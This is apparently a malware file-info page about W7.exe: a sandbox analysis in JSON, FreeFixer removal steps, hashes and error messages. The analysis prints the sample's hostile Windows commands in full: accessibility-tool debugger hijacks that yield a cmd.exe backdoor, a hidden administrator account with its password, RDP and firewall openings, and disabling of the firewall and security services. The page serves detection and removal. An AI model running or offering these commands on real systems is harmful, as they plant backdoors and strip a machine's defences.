"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\" \/v \"StartTimeLo\" \/t REG_DWORD \/d \"2386147405\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" \/v \"debugger\" \/t REG_SZ \/d \"drmsvc.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\" \/v \"fDenyTSConnections\" \/t REG_DWORD \/d 0x0 \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net start rasman",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v helpassistant \/t REG_DWORD \/d \"00000000\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net user ontar Preaba1! \/add \/active:\"yes\" \/expires:\"never\" \/passwordchg:\"NO\"",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxConnectionTime\" \/t REG_DWORD \/d 0x1 \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKLM\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\" \/v \"Epoch\" \/t REG_DWORD \/d \"9412\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net localgroup \"Remote Desktop Users\" ontar \/add",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxDisconnectionTime\" \/t REG_DWORD \/d 0x0 \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value ",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v ontar \/t REG_DWORD \/d \"00000000\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "sc stop SharedAccess",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "sc config wscsvc start= disabled",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKU\\S-1-5-21-1252767878-4065156067-3399968500-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\" \/v \"P:\\FUNER\\Iveghny\\Ertfubg.rkr\" \/t REG_BINARY \/d \"1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "sc config tlntsvr start= auto",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "netsh firewall add portopening TCP 4899 system",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net start remoteaccess",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\" \/v \"debugger\" \/t REG_SZ \/d \"drmsvc.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value | Find \"=\"",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "attrib +h +s \"C:\\Documents and settings\\ontar\" \/S \/D",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net accounts \/forcelogoff:no \/maxpwage:unlimited",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net localgroup Administrators ontar \/add",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"fixmapi.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value ",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Epoch\" \/v \"Epoch\" \/t REG_DWORD \/d \"9412\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \/v SFCDisable \/t REG_DWORD \/d \"FFFFFF9D\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" \/v \"debugger\" \/t REG_SZ \/d \"wpmsvc.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" \/v RPLifeInterval \/t REG_DWORD \/d \"00005180\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\" \/v \"debugger\" \/t REG_SZ \/d \"wpmsvc.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "sc config remoteaccess start= auto",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\" \/v \"LastPolicyTime\" \/t REG_DWORD \/d \"19856934\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\" \/v \"AllowTSConnections\" \/t REG_DWORD \/d 0x1 \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\" \/v \"debugger\" \/t REG_SZ \/d \"fixmapi.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "sc config SharedAccess start= disabled",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "sc config rasman start= auto",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0\" \/v \"Version\" \/t REG_DWORD \/d \"196611\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v UserAuthentication \/t REG_DWORD \/d 0x00000000 \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value | Find \"=\"",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxIdleTime\" \/t REG_DWORD \/d 0x0 \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "netsh firewall add portopening TCP 3389 system",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net accounts \/forcelogoff:no",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" \/v \"UserAuthentication\" \/t REG_DWORD \/d \"0\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net accounts \/maxpwage:unlimited",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\" \/v \"Version\" \/t REG_DWORD \/d \"196611\" \/f",
"type": "ioc",
"description": null
}
],
"references": [
"http:\/\/blog.jpcert.or.jp\/2016\/01\/windows-commands-abused-by-attackers.html"
],
"name": "uses_windows_utilities"
},
{
"markcount": 1,
"families": [],
"description": "Uses windows command to add a user to the administrator group",
"severity": 3,
"marks": [
{
"category": "cmdline",
"ioc": "net localgroup Administrators ontar \/add",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "adds_user_admin"
},
{
"markcount": 2,
"families": [],
"description": "Attempts to stop active services",
"severity": 3,
"marks": [
{
"call": {
"category": "services",
"status": 1,
"stacktrace": [],
"api": "ControlService",
"return_value": 1,
"arguments": {
"service_handle": "0x00321cc0",
"service_name": "wscsvc",
"control_code": 1
},
"time": 1574704400.296374,
"tid": 3928,
"flags": {}
},
"pid": 3968,
"type": "call",
"cid": 67
},
{
"call": {
"category": "services",
"status": 0,
"stacktrace": [],
"last_error": 1062,
"nt_status": 0,
"api": "ControlService",
"return_value": 0,
"arguments": {
"service_handle": "0x00581d10",
"service_name": "SharedAccess",
"control_code": 1
},
"time": 1574704400.484499,
"tid": 3188,
"flags": {}
},
"pid": 3104,
"type": "call",
"cid": 67
}
],
"references": [],
"name": "antiav_servicestop"
},
{
"markcount": 11,
"families": [],
"description": "Installs itself for autorun at Windows startup",
"severity": 3,
"marks": [
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\debugger",
"reg_value": "drmsvc.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\\debugger",
"reg_value": "drmsvc.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\debugger",
"reg_value": "wpmsvc.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger",
"reg_value": "cmd.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger",
"reg_value": "cmd.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
"reg_value": "%SystemRoot%\\system32\\rdpwrap.dll"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\\debugger",
"reg_value": "wpmsvc.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\\debugger",
"reg_value": "fixmapi.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\\debugger",
"reg_value": "fixmapi.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger",
"reg_value": "cmd.exe"
},
{
"type": "generic",
"reg_key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger",
"reg_value": "cmd.exe"
}
],
"references": [],
"name": "persistence_autorun"
},
{
"markcount": 1,
"families": [],
"description": "Operates on local firewall's policies and settings",
"severity": 3,
"marks": [
{
"category": "cmdline",
"ioc": "netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "bypass_firewall"
},
{
"markcount": 2,
"families": [],
"description": "Uses suspicious command line tools or Windows utilities",
"severity": 3,
"marks": [
{
"category": "cmdline",
"ioc": "cacls C:\\Windows\\SysWOW64\\dllcache\\sethc.exe \/G :F SYSTEM:F ",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "cacls C:\\Windows\\System32\\dllcache\\sethc.exe \/G :F SYSTEM:F",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "suspicious_command_tools"
}
]Yara
The Yara rules did not detect anything in the file.
Network
{
"tls": [],
"udp": [
{
"src": "192.168.56.101",
"dst": "192.168.56.255",
"offset": 546,
"time": 3.0796639919281006,
"dport": 137,
"sport": 137
},
{
"src": "192.168.56.101",
"dst": "192.168.56.255",
"offset": 5874,
"time": 6.207090854644775,
"dport": 138,
"sport": 138
},
{
"src": "192.168.56.101",
"dst": "224.0.0.252",
"offset": 10112,
"time": 14.655167818069458,
"dport": 5355,
"sport": 49840
},
{
"src": "192.168.56.101",
"dst": "224.0.0.252",
"offset": 10440,
"time": 3.012025833129883,
"dport": 5355,
"sport": 51001
},
{
"src": "192.168.56.101",
"dst": "224.0.0.252",
"offset": 10768,
"time": 1.0156757831573486,
"dport": 5355,
"sport": 53595
},
{
"src": "192.168.56.101",
"dst": "224.0.0.252",
"offset": 11096,
"time": 3.0189499855041504,
"dport": 5355,
"sport": 53848
},
{
"src": "192.168.56.101",
"dst": "224.0.0.252",
"offset": 11424,
"time": 1.5184619426727295,
"dport": 5355,
"sport": 54255
},
{
"src": "192.168.56.101",
"dst": "224.0.0.252",
"offset": 11752,
"time": -0.09948205947875977,
"dport": 5355,
"sport": 55314
},
{
"src": "192.168.56.101",
"dst": "224.0.0.252",
"offset": 12080,
"time": 6.247862815856934,
"dport": 5355,
"sport": 55880
},
{
"src": "192.168.56.101",
"dst": "239.255.255.250",
"offset": 12408,
"time": 1.0364928245544434,
"dport": 1900,
"sport": 1900
},
{
"src": "192.168.56.101",
"dst": "239.255.255.250",
"offset": 31818,
"time": 1.0367469787597656,
"dport": 3702,
"sport": 49152
},
{
"src": "192.168.56.101",
"dst": "239.255.255.250",
"offset": 40202,
"time": 3.1412580013275146,
"dport": 1900,
"sport": 53598
},
{
"src": "192.168.56.101",
"dst": "255.255.255.255",
"offset": 45478,
"time": 14.641753911972046,
"dport": 67,
"sport": 68
}
],
"dns_servers": [],
"http": [],
"icmp": [],
"smtp": [],
"tcp": [],
"smtp_ex": [],
"mitm": [],
"hosts": [],
"pcap_sha256": "4524cb4aafdac1ee84dbaed1613f418c246030a5f24d44de2097a8fa7bb6c138",
"dns": [],
"http_ex": [],
"domains": [],
"dead_hosts": [],
"sorted_pcap_sha256": "911b1701273c98289aecbf3b65345793d5d0b1a98508bfd61b9f5ab26ee62c10",
"irc": [],
"https_ex": []
}Screenshots
W7.exe removal instructions
The instructions below shows how to remove W7.exe with help from the FreeFixer removal tool. Basically, you install FreeFixer, scan your computer, check the W7.exe file for removal, restart your computer and scan it again to verify that W7.exe has been successfully removed. Here are the removal instructions in more detail:
- Download and install FreeFixer: http://www.freefixer.com/download.html
- Start FreeFixer and press the Start Scan button. The scan will finish in approximately five minutes.
- When the scan is finished, locate W7.exe in the scan result and tick the checkbox next to the W7.exe file. Do not check any other file for removal unless you are 100% sure you want to delete it. Tip: Press CTRL-F to open up FreeFixer's search dialog to quickly locate W7.exe in the scan result.
c:\downloads\W7.exe 
- Scroll down to the bottom of the scan result and press the Fix button. FreeFixer will now delete the W7.exe file.
- Restart your computer.
- Start FreeFixer and scan your computer again. If W7.exe still remains in the scan result, proceed with the next step. If W7.exe is gone from the scan result you're done.
- If W7.exe still remains in the scan result, check its checkbox again in the scan result and click Fix.
- Restart your computer.
- Start FreeFixer and scan your computer again. Verify that W7.exe no longer appear in the scan result.
Hashes [?]
| Property | Value |
|---|---|
| MD5 | e3f4e3e07da97cd75265f4ee2af87540 |
| SHA256 | 903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a |
Error Messages
These are some of the error messages that can appear related to w7.exe:
w7.exe has encountered a problem and needs to close. We are sorry for the inconvenience.
w7.exe - Application Error. The instruction at "0xXXXXXXXX" referenced memory at "0xXXXXXXXX". The memory could not be "read/written". Click on OK to terminate the program.
w7.exe has stopped working.
End Program - w7.exe. This program is not responding.
w7.exe is not a valid Win32 application.
w7.exe - Application Error. The application failed to initialize properly (0xXXXXXXXX). Click OK to terminate the application.
What will you do with W7.exe?
To help other users, please let us know what you will do with W7.exe:
Comments
Please share with the other users what you think about this file. What does this file do? Is it legitimate or something that your computer is better without? Do you know how it was installed on your system? Did you install it yourself or did it come bundled with some other software? Is it running smoothly or do you get some error message? Any information that will help to document this file is welcome. Thank you for your contributions.
I'm reading all new comments so don't hesitate to post a question about the file. If I don't have the answer perhaps another user can help you.
No comments posted yet.